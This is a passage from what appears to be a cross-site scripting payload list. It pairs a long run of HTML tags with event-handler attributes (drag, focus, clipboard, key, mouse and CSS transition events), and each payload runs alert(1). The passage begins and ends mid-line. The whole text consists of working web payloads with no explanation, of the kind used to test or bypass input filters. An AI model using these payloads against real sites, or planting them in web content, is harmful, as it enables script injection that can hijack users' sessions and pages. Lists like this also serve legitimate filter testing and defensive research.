onmouseup="alert(1)">test</span> +<span onpaste="alert(1)" contenteditable>test</span> +<strike draggable="true" ondrag="alert(1)">test</strike> +<strike draggable="true" ondragend="alert(1)">test</strike> +<strike draggable="true" ondragenter="alert(1)">test</strike> +<strike draggable="true" ondragleave="alert(1)">test</strike> +<strike draggable="true" ondragstart="alert(1)">test</strike> +<strike id=x tabindex=1 onactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus> +<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus> +<strike id=x tabindex=1 onfocus=alert(1)></strike> +<strike id=x tabindex=1 onfocusin=alert(1)></strike> +<strike onbeforecopy="alert(1)" contenteditable>test</strike> +<strike onbeforecut="alert(1)" contenteditable>test</strike> +<strike onbeforepaste="alert(1)" contenteditable>test</strike> +<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onclick="alert(1)">test</strike> +<strike oncontextmenu="alert(1)">test</strike> +<strike oncopy="alert(1)" contenteditable>test</strike> +<strike oncut="alert(1)" contenteditable>test</strike> +<strike ondblclick="alert(1)">test</strike> +<strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onkeydown="alert(1)" contenteditable>test</strike> +<strike onkeypress="alert(1)" contenteditable>test</strike> +<strike onkeyup="alert(1)" contenteditable>test</strike> +<strike onmousedown="alert(1)">test</strike> +<strike onmouseenter="alert(1)">test</strike> +<strike onmouseleave="alert(1)">test</strike> +<strike onmousemove="alert(1)">test</strike> +<strike onmouseout="alert(1)">test</strike> +<strike onmouseover="alert(1)">test</strike> +<strike onmouseup="alert(1)">test</strike> +<strike onpaste="alert(1)" contenteditable>test</strike> +<strong draggable="true" ondrag="alert(1)">test</strong> +<strong draggable="true" ondragend="alert(1)">test</strong> +<strong draggable="true" ondragenter="alert(1)">test</strong> +<strong draggable="true" ondragleave="alert(1)">test</strong> +<strong draggable="true" ondragstart="alert(1)">test</strong> +<strong id=x tabindex=1 onactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforeactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus> +<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus> +<strong id=x tabindex=1 onfocus=alert(1)></strong> +<strong id=x tabindex=1 onfocusin=alert(1)></strong> +<strong onbeforecopy="alert(1)" contenteditable>test</strong> +<strong onbeforecut="alert(1)" contenteditable>test</strong> +<strong onbeforepaste="alert(1)" contenteditable>test</strong> +<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onclick="alert(1)">test</strong> +<strong oncontextmenu="alert(1)">test</strong> +<strong oncopy="alert(1)" contenteditable>test</strong> +<strong oncut="alert(1)" contenteditable>test</strong> +<strong ondblclick="alert(1)">test</strong> +<strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onkeydown="alert(1)" contenteditable>test</strong> +<strong onkeypress="alert(1)" contenteditable>test</strong> +<strong onkeyup="alert(1)" contenteditable>test</strong> +<strong onmousedown="alert(1)">test</strong> +<strong onmouseenter="alert(1)">test</strong> +<strong onmouseleave="alert(1)">test</strong> +<strong onmousemove="alert(1)">test</strong> +<strong onmouseout="alert(1)">test</strong> +<strong onmouseover="alert(1)">test</strong> +<strong onmouseup="alert(1)">test</strong> +<strong onpaste="alert(1)" contenteditable>test</strong> +<style draggable="true" ondrag="alert(1)">test</style> +<style draggable="true" ondragend="alert(1)">test</style> +<style draggable="true" ondragenter="alert(1)">test</style> +<style draggable="true" ondragleave="alert(1)">test</style> +<style draggable="true" ondragstart="alert(1)">test</style> +<style id=x tabindex=1 onactivate=alert(1)></style> +<style id=x tabindex=1 onbeforeactivate=alert(1)></style> +<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus> +<style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus> +<style id=x tabindex=1 onfocus=alert(1)></style> +<style id=x tabindex=1 onfocusin=alert(1)></style> +<style onbeforecopy="alert(1)" contenteditable>test</style> +<style onbeforecut="alert(1)" contenteditable>test</style> +<style onbeforepaste="alert(1)" contenteditable>test</style> +<style onblur=alert(1) tabindex=1 id=x></style><input autofocus> +<style onclick="alert(1)">test</style> +<style oncontextmenu="alert(1)">test</style> +<style oncopy="alert(1)" contenteditable>test</style> +<style oncut="alert(1)" contenteditable>test</style> +<style ondblclick="alert(1)">test</style> +<style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus> +<style onkeydown="alert(1)" contenteditable>test</style> +<style onkeypress="alert(1)" contenteditable>test</style> +<style onkeyup="alert(1)" contenteditable>test</style> +<style onload=alert(1)></style> +<style onmousedown="alert(1)">test</style> +<style onmouseenter="alert(1)">test</style> +<style onmouseleave="alert(1)">test</style> +<style onmousemove="alert(1)">test</style> +<style onmouseout="alert(1)">test</style> +<style onmouseover="alert(1)">test</style> +<style onmouseup="alert(1)">test</style> +<style onpaste="alert(1)" contenteditable>test</style> +<style onreadystatechange=alert(1)></style> +<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a> +<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr> +<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym> +<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address> +<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet> +<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area> +<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article> +<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside> +<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio> +<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b> +<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base> +<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont> +<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi> +<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo> +<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound> +<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big> +<style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(1)></blink> +<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote> +<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body> +<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br> +<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button> +<style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas> +<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption> +<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center> +<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite> +<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code> +<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col> +<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup> +<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command> +<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content> +<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data> +<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist> +<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd> +<style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(1)></del> +<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details> +<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn> +<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog> +<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir> +<style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(1)></div> +<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl> +<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt> +<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element> +<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em> +<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed> +<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset> +<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption> +<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure> +<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font> +<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer> +<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form> +<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame> +<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset> +<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1> +<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head> +<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header> +<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup> +<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr> +<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html> +<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> +<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe> +<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image> +<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img> +<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input> +<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins> +<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex> +<style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)></kbd> +<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen> +<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label> +<style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(1)></legend> +<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li> +<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link> +<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing> +<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main> +<style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(1)></map> +<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark> +<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee> +<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu> +<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem> +<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta> +<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter> +<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol> +<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav> +<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid> +<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr> +<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed> +<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)></noframes> +<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript> +<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object> +<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol> +<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup> +<style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(1)></option> +<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output> +<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p> +<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param> +<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture> +<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext> +<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre> +<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress> +<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q> +<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb> +<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp> +<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt> +<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc> +<style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby> +<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s> +<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp> +<style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script> +<style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section> +<style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select> +<style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow> +<style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot> +<style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small> +<style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source> +<style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer> +<style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span> +<style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike> +<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong> +<style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style> +<style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub> +<style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary> +<style>:target {color: red;}</style><sup id=x style="transition:color 10s" ontransitioncancel=alert(1)></sup> +<style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg> +<style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table> +<style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody> +<style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td> +<style>:target {color: red;}</style><template id=x style="transition:color 10s" ontransitioncancel=alert(1)></template> +<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea> +<style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot> +<style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th> +<style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead> +<style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time> +<style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title> +<style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr> +<style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track> +<style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt> +<style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u> +<style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul> +<style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var> +<style>:target {color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video> +<style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr> +<style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp> +<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a> +<style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr> +<style>:target {color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym> +<style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address> +<style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet> +<style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area> +<style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article> +<style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside> +<style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio> +<style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b> +<style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base> +<style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont> +<style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi> +<style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo> +<style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound> +<style>:target {color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big> +<style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink> +<style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote> +<style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body> +<style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br> +<style>:target {color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button> +<style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas> +<style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption> +<style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center> +<style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite> +<style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code> +<style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col> +<style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup> +<style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command> +<style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content> +<style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data> +<style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist> +<style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd> +<style>:target {color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del> +<style>:target {color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details> +<style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn> +<style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog> +<style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir> +<style>:target {color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div> +<style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl> +<style>:target {color:red;}</style><dt id=x style="transition:color 1s" ontransitionend=alert(1)></dt> +<style>:target {color:red;}</style><element id=x style="transition:color 1s" ontransitionend=alert(1)></element> +<style>:target {color:red;}</style><em id=x style="transition:color 1s" ontransitionend=alert(1)></em> +<style>:target {color:red;}</style><embed id=x style="transition:color 1s" ontransitionend=alert(1)></embed> +<style>:target {color:red;}</style><fieldset id=x style="transition:color 1s" ontransitionend=alert(1)></fieldset> +<style>:target {color:red;}</style><figcaption id=x style="transition:color 1s" ontransitionend=alert(1)></figcaption> +<style>:target {color:red;}</style><figure id=x style="transition:color 1s" ontransitionend=alert(1)></figure> +<style>:target {color:red;}</style><font id=x style="transition:color 1s" ontransitionend=alert(1)></font> +<style>:target {color:red;}</style><footer id=x style="transition:color 1s" ontransitionend=alert(1)></footer> +<style>:target {color:red;}</style><form id=x style="transition:color 1s" ontransitionend=alert(1)></form> +<style>:target {color:red;}</style><frame id=x style="transition:color 1s" ontransitionend=alert(1)></frame> +<style>:target {color:red;}</style><frameset id=x style="transition:color 1s" ontransitionend=alert(1)></frameset> +<style>:target {color:red;}</style><h1 id=x style="transition:color 1s" ontransitionend=alert(1)></h1> +<style>:target {color:red;}</style><head id=x style="transition:color 1s" ontransitionend=alert(1)></head> +<style>:target {color:red;}</style><header id=x style="transition:color 1s" ontransitionend=alert(1)></header> +<style>:target {color:red;}</style><hgroup id=x style="transition:color 1s" ontransitionend=alert(1)></hgroup> +<style>:target {color:red;}</style><hr id=x style="transition:color 1s" ontransitionend=alert(1)></hr> +<style>:target {color:red;}</style><html id=x style="transition:color 1s" ontransitionend=alert(1)></html> +<style>:target {color:red;}</style><i id=x style="transition:color 1s" ontransitionend=alert(1)></i> +<style>:target {color:red;}</style><iframe id=x style="transition:color 1s" ontransitionend=alert(1)></iframe> +<style>:target {color:red;}</style><image id=x style="transition:color 1s" ontransitionend=alert(1)></image> +<style>:target {color:red;}</style><img id=x style="transition:color 1s" ontransitionend=alert(1)></img> +<style>:target {color:red;}</style><input id=x style="transition:color 1s" ontransitionend=alert(1)></input> +<style>:target {color:red;}</style><ins id=x style="transition:color 1s" ontransitionend=alert(1)></ins> +<style>:target {color:red;}</style><isindex id=x style="transition:color 1s" ontransitionend=alert(1)></isindex> +<style>:target {color:red;}</style><kbd id=x style="transition:color 1s" ontransitionend=alert(1)></kbd> +<style>:target {color:red;}</style><keygen id=x style="transition:color 1s" ontransitionend=alert(1)></keygen> +<style>:target {color:red;}</style><label id=x style="transition:color 1s" ontransitionend=alert(1)></label> +<style>:target {color:red;}</style><legend id=x style="transition:color 1s" ontransitionend=alert(1)></legend> +<style>:target {color:red;}</style><li id=x style="transition:color 1s" ontransitionend=alert(1)></li> +<style>:target {color:red;}</style><link id=x style="transition:color 1s" ontransitionend=alert(1)></link> +<style>:target {color:red;}</style><listing id=x style="transition:color 1s" ontransitionend=alert(1)></listing> +<style>:target {color:red;}</style><main id=x style="transition:color 1s" ontransitionend=alert(1)></main> +<style>:target {color:red;}</style><map id=x style="transition:color 1s" ontransitionend=alert(1)></map> +<style>:target {color:red;}</style><mark id=x style="transition:color 1s" ontransitionend=alert(1)></mark> +<style>:target {color:red;}</style><marquee id=x style="transition:color 1s" ontransitionend=alert(1)></marquee> +<style>:target {color:red;}</style><menu id=x style="transition:color 1s" ontransitionend=alert(1)></menu> +<style>:target {color:red;}</style><menuitem id=x style="transition:color 1s" ontransitionend=alert(1)></menuitem> +<style>:target {color:red;}</style><meta id=x style="transition:color 1s" ontransitionend=alert(1)></meta> +<style>:target {color:red;}</style><meter id=x style="transition:color 1s" ontransitionend=alert(1)></meter> +<style>:target {color:red;}</style><multicol id=x style="transition:color 1s" ontransitionend=alert(1)></multicol> +<style>:target {color:red;}</style><nav id=x style="transition:color 1s" ontransitionend=alert(1)></nav> +<style>:target {color:red;}</style><nextid id=x style="transition:color 1s" ontransitionend=alert(1)></nextid> +<style>:target {color:red;}</style><nobr id=x style="transition:color 1s" ontransitionend=alert(1)></nobr> +<style>:target {color:red;}</style><noembed id=x style="transition:color 1s" ontransitionend=alert(1)></noembed> +<style>:target {color:red;}</style><noframes id=x style="transition:color 1s" ontransitionend=alert(1)></noframes> +<style>:target {color:red;}</style><noscript id=x style="transition:color 1s" ontransitionend=alert(1)></noscript> +<style>:target {color:red;}</style><object id=x style="transition:color 1s" ontransitionend=alert(1)></object> +<style>:target {color:red;}</style><ol id=x style="transition:color 1s" ontransitionend=alert(1)></ol> +<style>:target {color:red;}</style><optgroup id=x style="transition:color 1s" ontransitionend=alert(1)></optgroup> +<style>:target {color:red;}</style><option id=x style="transition:color 1s" ontransitionend=alert(1)></option> +<style>:target {color:red;}</style><output id=x style="transition:color 1s" ontransitionend=alert(1)></output> +<style>:target {color:red;}</style><p id=x style="transition:color 1s" ontransitionend=alert(1)></p> +<style>:target {color:red;}</style><param id=x style="transition:color 1s" ontransitionend=alert(1)></param> +<style>:target {color:red;}</style><picture id=x style="transition:color 1s" ontransitionend=alert(1)></picture> +<style>:target {color:red;}</style><plaintext id=x style="transition:color 1s" ontransitionend=alert(1)></plaintext> +<style>:target {color:red;}</style><pre id=x style="transition:color 1s" ontransitionend=alert(1)></pre> +<style>:target {color:red;}</style><progress id=x style="transition:color 1s" ontransitionend=alert(1)></progress> +<style>:target {color:red;}</style><q id=x style="transition:color 1s" ontransitionend=alert(1)></q> +<style>:target {color:red;}</style><rb id=x style="transition:color 1s" ontransitionend=alert(1)></rb> +<style>:target {color:red;}</style><rp id=x style="transition:color 1s" ontransitionend=alert(1)></rp> +<style>:target {color:red;}</style><rt id=x style="transition:color 1s" ontransitionend=alert(1)></rt> +<style>:target {color:red;}</style><rtc id=x style="transition:color 1s" ontransitionend=alert(1)></rtc> +<style>:target {color:red;}</style><ruby id=x style="transition:color 1s" ontransitionend=alert(1)></ruby> +<style>:target {color:red;}</style><s id=x style="transition:color 1s" ontransitionend=alert(1)></s> +<style>:target {color:red;}</style><samp id=x style="transition:color 1s" ontransitionend=alert(1)></samp> +<style>:target {color:red;}</style><script id=x style="transition:color 1s" ontransitionend=alert(1)></script> +<style>:target {color:red;}</style><section id=x style="transition:color 1s" ontransitionend=alert(1)></section> +<style>:target {color:red;}</style><select id=x style="transition:color 1s" ontransitionend=alert(1)></select> +<style>:target {color:red;}</style><shadow id=x style="transition:color 1s" ontransitionend=alert(1)></shadow> +<style>:target {color:red;}</style><slot id=x style="transition:color 1s" ontransitionend=alert(1)></slot> +<style>:target {color:red;}</style><small id=x style="transition:color 1s" ontransitionend=alert(1)></small> +<style>:target {color:red;}</style><source id=x style="transition:color 1s" ontransitionend=alert(1)></source> +<style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer> +<style>:target {color:red;}</style><span id=x style="transition:color 1s" ontransitionend=alert(1)></span> +<style>:target {color:red;}</style><strike id=x style="transition:color 1s" ontransitionend=alert(1)></strike> +<style>:target {color:red;}</style><strong id=x style="transition:color 1s" ontransitionend=alert(1)></strong> +<style>:target {color:red;}</style><style id=x style="transition:color 1s" ontransitionend=alert(1)></style> +<style>:target {color:red;}</style><sub id=x style="transition:color 1s" ontransitionend=alert(1)></sub> +<style>:target {color:red;}</style><summary id=x style="transition:color 1s" ontransitionend=alert(1)></summary> +<style>:target {color:red;}</style><sup id=x style="transition:color 1s" ontransitionend=alert(1)></sup> +<style>:target {color:red;}</style><svg id=x style="transition:color 1s" ontransitionend=alert(1)></svg> +<style>:target {color:red;}</style><table id=x style="transition:color 1s" ontransitionend=alert(1)></table> +<style>:target {color:red;}</style><tbody id=x style="transition:color 1s" 